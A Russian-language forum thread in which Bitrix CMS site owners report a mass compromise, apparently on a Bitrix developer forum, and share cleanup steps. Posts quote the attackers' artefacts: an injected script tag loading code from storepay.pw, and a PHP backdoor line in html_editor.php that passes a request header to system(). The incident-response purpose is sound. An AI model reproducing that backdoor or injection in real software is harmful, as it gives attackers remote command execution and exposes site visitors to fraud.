| Цитата |
|---|
| написал: pload/tmp/BXTEMP-ДД-ММ-ГГ создаетс |
|
Разработчикам |
Взломаны сайты в честь дня конституции украины
Взломаны сайты в честь дня конституции украины
|
|||||
|
|
|
|
В /upload/tmp появился файл yt.php
В публичном разделе, в каждой папке структуры (/catalog/ /about/ итд) тоже он. Нашлись с помощью В самом файле не читабельное месиво, что делает не понятно. Нашелся на двух сайтах.
------------------------------------------
Всякое про битрикс |
|
|
|
|
Автоматизация Торговли (319758.ru)
|
|||
|
|
|
|
Я запретил папке prolog и файлу core.js редактирование, пока вирус не появлялся после этого. Следим за развитием ситуации...
|
|
|
|
|
|
Здравствуйте, подскажите пожалуйста, обнаружили неизвестный нам агент на сайте, с таким содержимым:
Нельзя ли определить, какой вред мог нанести данный код? |
|||
|
|
|
|
Я если честно пока ветку дочитал просто чуть со смеху не помер, есть хоть кто то кто осознал проблему BITRIX , хоть кто-то кто понимает что вся линейка BITRIX просто дыра возможно не умышленно сделали лазейки для себя а возможно по тупости и некомпетентности. Скачал свежую сборочку и проверил на несколько видов атак.. был удивлен и разочарован, дыры пришлось устранять самостоятельно, разочарую всех у кого не VPS ... ГОТОВЬТЕСЬ К ВЗЛОМУ ИЛИ ПРОСТО ИЩИТЕ НОВЫЙ ДВИЖОК...
|
|
|
|
|
|
|||
|
|
|
|
Алексей Чебанов, поясните этот момент
Какие именно виды атак на свежей сборки прошли? Какие дыры Вы залатали? |
|||
|
|
|
|
Еще раз отвечу и думаю поставлю точку. Я не могу Вам тут описать метод взлома и уязвимости БИТРИКС это не законно, кому нужна свежая сборка скачивайте виртуальную машину и далее делайте стандартную установку предложенными в упаковке скриптами. Чтоб как то себя обезопасить делайте копию рабочего сайта каждые 12 часов. Я готов выложить компании Битрикс решения для ВПС серверов . А ведь помница мне как я ругался с поддержкой и ранее описывал им их ошибки и халатность, допрыгались , слушать надо когда Вам что то говорят , а не оскорблять. Пожинаем плоды дебилокодеров
|
|
|
|
|
|
Алексей Чебанов, Вас оскорбляли?
Так и не понял, чем решение для vps будет отличаться от решения для шаред хостинга |
|
|
|
|
Решениями он поделится, без тебя эксперта разберутся. Делать копию каждые 12 часов... а почему не 6? Вовремя обновляться надо и следовать лучшим практикам безопасности, вот и все. |
|||
|
|
|
|
История получила продолжение
Проверяйте у себя /usr/sbin/arpspoof И если он есть, то вероятно ваша сеть (ессно помимо сервера) скомпроментированы |
|
|
|
|
|
Это если кроны битры выполнялись от рута вероятно
Многие не учитывают почему-то этот момент |
|
|
|
|
Зачем кому-то это делать? |
|||
|
|
|
По сути изучают внутреннюю сеть для дальнейших атак Выяснили как раз за счёт спуфинга некоторых адресов наших клиентов У всех жертв общее это выделенный сервер с уязвимой битрой и кронами от рута |
|||
|
|
|
Автоматизация Торговли (319758.ru)
|
|||
|
|
|
Дак это ж всё - сразу "Привет" Скрипт будет выполняться от рута, со всеми вытекающими ... |
|||
|
|
|
Автоматизация Торговли (319758.ru)
|
|||
|
|
|
|
=)
|
|
|
|
|
|
|||
|
|
|
Обновление ядра не помогло ранее. |
|||||
|
|
|
|
в prolog и core.js нет вредоносных строк, а код сайта встраивается <sc ript src='https://storepay.pw/jqueryui.js'></sc ript> Где может еще прятаться?
|
|
|
|
|
поиском поищите, либо методом исключения ... уже встроенную рабочую иньекцию думаю найти то можно вообще вот хорошая статья на эту тему (но это от будущих заражений, то что уже заражено нужно самому вычистить). Пишут, что зараза редиректит на фейковый сайт озона - а это попахивает "жареным" т.е. посетители запросто могут там что то приобрести ... Если коротенько * чистим /bitrix/js/main/core/core.js (в конце - строчка начинается с s=document.createElement(script) ) * чистим /bitrix/modules/main/include/prolog.php (в конце - строчка подключения jqueryui.js) * убиваем /bitrix/components/bitrix/main.file.input/main.php (я так понимаю скрипт управления - чтоб проще заливать было что захочешь) * чистим /bitrix/modules/fileman/classes/general/html_editor.php (вырезаем 2 строчки - бэкдор на выполнение system()) "spell_word" => $_SERVER['HTTP_S'] == "bermuda" ? die(system($_SERVER['HTTP_P'])) : "", И if(substr($_POST['bxu_info']['CID'], 0, 7 ) === "default") die(); Внимание! - искать не полностью по вхождению т.к. у меня вместо bermuda было speaker А в следующей статье - как залатать дыры, чтобы такое больше не появлялось, правда боюсь с такой реализацией могут быть проблемы с встроенным html редактором - поэтому думаю правильнее просто обновить Битрикс до актуальной версии.
|
|||||
|
|
|
судя по информации в статьях из предыдущего поста - с большой долей вероятности вас взломали через уязвимость html_editor_action.php - все симптомы взлом "на лицо" на сайте, где в данный момент занимаюсь этой проблемой обнаружил тоже самое "снос" данной папки Вам вообще ничего не даст - это следы взлома, нужно защищать html_editor_action.php либо обновляться |
||||
|
|
|
|||
